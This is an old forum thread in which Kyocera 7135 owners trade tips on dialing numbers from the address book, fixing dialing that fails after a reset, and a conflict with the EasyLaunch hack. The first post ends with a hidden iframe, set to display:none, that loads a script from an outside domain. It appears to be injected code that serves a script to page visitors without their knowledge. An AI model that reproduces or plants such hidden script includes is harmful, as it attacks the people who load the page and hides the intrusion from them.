+ Reply to Thread
Results 1 to 13 of 13
  1. #1
    Registered User
    Join Date
    01-15-2003
    Posts
    53

    question about dialing from address book

    Is there a way to avoid using the stylus to change which number you want the phone to dial when dialing from the address book? Also, is there a way to change the setting so that when you hit the down button, it goes to the next page in your address book rather than the next name -- I know if you hold down the button it speeds through faster.

    Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    12-14-2002
    Posts
    45

    Re: question about dialing from address book

    Depends what you mean ...

    If you literally want to change the number displayed in the address book list view, then yes, you have to use the stylus.

    But if you want to dial any number from your address book without using your stylus, yes, here is how:

    1. Scroll to the entry in the address book that you want to call.
    2. Hit the OK button -- should take you to the "Address View" screen
    3. Scroll to the number you wish to call
    4. Push the "talk" button (on phone keypad)

    The phone will dial the selected number.

    delrey

    (In step #2 If you hit OK twice by accident, you'll get to the "Address Edit" screen -- then hit OK to go back to the address book list and try step #2 again).




    Originally posted by msneider
    Is there a way to avoid using the stylus to change which number you want the phone to dial when dialing from the address book? Also, is there a way to change the setting so that when you hit the down button, it goes to the next page in your address book rather than the next name -- I know if you hold down the button it speeds through faster.

    Thanks.

  3. #3
    Registered User
    Join Date
    01-15-2003
    Posts
    53
    Thanks. Is there a way to move from page to page with one click other than just holding down the button?

  4. #4
    Registered User
    Join Date
    12-14-2002
    Posts
    45
    No, I don't think so. Though holding down the button does scroll pages rather than entries.

    If you have your address book entries seperated into categories, then repeatedly pressing the button you have mapped to your address book app (2nd from left by default, of course) will cycle through available categories.

    Originally posted by msneider
    Thanks. Is there a way to move from page to page with one click other than just holding down the button?

  5. #5
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914

    Re: Re: question about dialing from address book

    Originally posted by delrey
    Depends what you mean ...

    If you literally want to change the number displayed in the address book list view, then yes, you have to use the stylus.

    But if you want to dial any number from your address book without using your stylus, yes, here is how:

    1. Scroll to the entry in the address book that you want to call.
    2. Hit the OK button -- should take you to the "Address View" screen
    3. Scroll to the number you wish to call
    4. Push the "talk" button (on phone keypad)

    The phone will dial the selected number.

    delrey

    (In step #2 If you hit OK twice by accident, you'll get to the "Address Edit" screen -- then hit OK to go back to the address book list and try step #2 again).
    I was just discussing this with "Steve" when we had luch together today to compare his "Verizon" 7135 with my originally Alltel (GetConnected) model...

    His does the job mentioned above. But while mine did that for about the first two weeks, it no longer lets me do that.

    After I "3. Scroll to the number you wish to call"
    and "4. Push the "talk" button (on phone keypad)"
    it just takes me to the phone app., but then DOESN'T dial the number.

    Like I said, it did it the right way for awhile, but hasn't for about two months.

    Is anyone else experiencing this problem?
    ~'kito
    pdaPhoneHome Moderator

  6. #6
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Yes! I was just coming back to this thread to post about this. Mine did exactly what yours did: When hitting the talk button on a number, came back to the Phone app, but didn't ever dial. I decided to try a soft reset, after which it did dial successfully. So I'm curious to see if that helps with anyone else.

    Another interesting glitch, but I think this one is my fault: When I am in my phone app, the button mapped to my addressbook at first did not take me to the addressbook. It did nothing. All other buttons worked as they should and took me to the appropriate palm app. Then I turned off EasyLaunch (hack that maps up to 3 apps to each button, which I love), and it worked fine. Turned EasyLaunch back on again, and it still works. Hmmmm....

    Also, while this worked in my old Visor, in the Kyo addressbook, hitting the addressbook button multiple times does not scroll through the categories. This is unaffected for me by soft reset or by hacks. Does this work for everyone else? (I.e., should I keep looking for something I did that's causing this? )

  7. #7
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Originally posted by turboCat
    Yes! I was just coming back to this thread to post about this. Mine did exactly what yours did: When hitting the talk button on a number, came back to the Phone app, but didn't ever dial. I decided to try a soft reset, after which it did dial successfully.
    t-cat,

    Are you sure that you didn't mean to say "Hard reset" instead? Because I have done several "soft" resets since the dial problem set in and it has never corrected it. But I haven't (and don't feel like doing) a hard reset. Hmmmm.
    ~'kito
    pdaPhoneHome Moderator

  8. #8
    Moddin' & Poddin' Markito's Avatar
    Join Date
    05-04-2001
    Posts
    3,914
    Originally posted by turboCat
    Also, while this worked in my old Visor, in the Kyo addressbook, hitting the addressbook button multiple times does not scroll through the categories. This is unaffected for me by soft reset or by hacks. Does this work for everyone else?
    t,
    My 7135 has always been able to scroll through the categories in AddressBook using the hard button. Even just now. Another EasyLaunch hack issue perhaps?
    ~'kito
    pdaPhoneHome Moderator

  9. #9
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Originally posted by Markito
    t-cat,

    Are you sure that you didn't mean to say "Hard reset" instead? Because I have done several "soft" resets since the dial problem set in and it has never corrected it. But I haven't (and don't feel like doing) a hard reset. Hmmmm.
    Nope, definitely meant soft reset. I did it before I posted, couldn't dial from the addressbook before with the talk button, could after. I can understand not wanting to do the hard reset!

    Interesting about the category switching. I turned EL off, and it didn't change it. I guess I'll try turning it off, soft resetting, and then see....

    Update: Well, that fixed it! Now I guess I have to decide which is more useful to me.... Bummer. I think EL is going to win, though. Oh well, at least now I know why-- always a good thing!

  10. #10
    Registered User
    Join Date
    04-10-2003
    Posts
    2
    I have noticed that the first two phone entries for a name work, but the thrid and fourth ones don't

  11. #11
    Registered User
    Join Date
    12-14-2002
    Posts
    45
    Hmm. Well the third and fourth ones work fine for me.

    Maybe I don't understand what you mean by "work" and "don't" -- I can scroll to an entry, select it, scroll down the the number I want (I tested 1st, 2nd, 3rd, and 4th number) and push the "talk" (green phone button on keypad) button to call that number.

    (BTW I have an Alltel phone activated on Verizon, no firmware upgrades)

    Does the above not work for you? Maybe you're seeing a software conflict with an add on program?

    t-cat & 'kito, bummer that those little things aren't working for you I now have had the caller id bug appear, lest you think all is 100% trouble free here!

    it's always something,
    -- delrey

    Originally posted by bswartz
    I have noticed that the first two phone entries for a name work, but the thrid and fourth ones don't

  12. #12
    Registered User
    Join Date
    04-21-2003
    Posts
    1
    Hi, I just got my 7135, and am having the same problem too.

    Note, all I've done is sync in my address book from my PC - nothing else is installed on the 7135. Anyway, here's what I try to do, and what happens:

    1. Hit the address button (phone icon)
    2. Scroll down to a specific friend's listing
    3. Hit OK
    4. Scroll down to which specific phone number I want to call
    5. Hit the green "dial" button.

    Then... nothing happens. I can repeatedly hit the green button, and it just sits there. Nothing happens for any of the numbers I select.

    The interesting thing: This does this only for this one person's phone numbers. It WAS doing this same thing for several other people, but now it appears to just be him. I've tried several soft resets, and still his address book entry is stuck in this limbo.

    Another interesting fact - while Caller-ID works fine, it doesn't auto-recognize his calls (i.e. his name doesn't appear when he calls, just his number). Again, other address book entries work fine - they call and their name and (home) (business) (mobile) icons appear. For him - just a number.

    So, any clues out there? I'm about to try deleting his entry, but haven't had time yet...

  13. #13
    Registered User TMWebSites's Avatar
    Join Date
    08-25-2003
    Location
    San Diego
    Posts
    219
    Mine works fine on multiple entries, I tried on one that has 4 phone numbers and 1 e-mail address. The e-mail address is the 4th entry.

    I can scroll down to any of them and hit the green button and it works fine. If I hit it on the e-mail address it creates an e-mail with the "to" filled in. I also tried with a company name and title entered in the address book and it worked fine.

    You should try creating a new entry for his info and give it the same information and see if it works. Seems odd that it would do it for some and not others.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts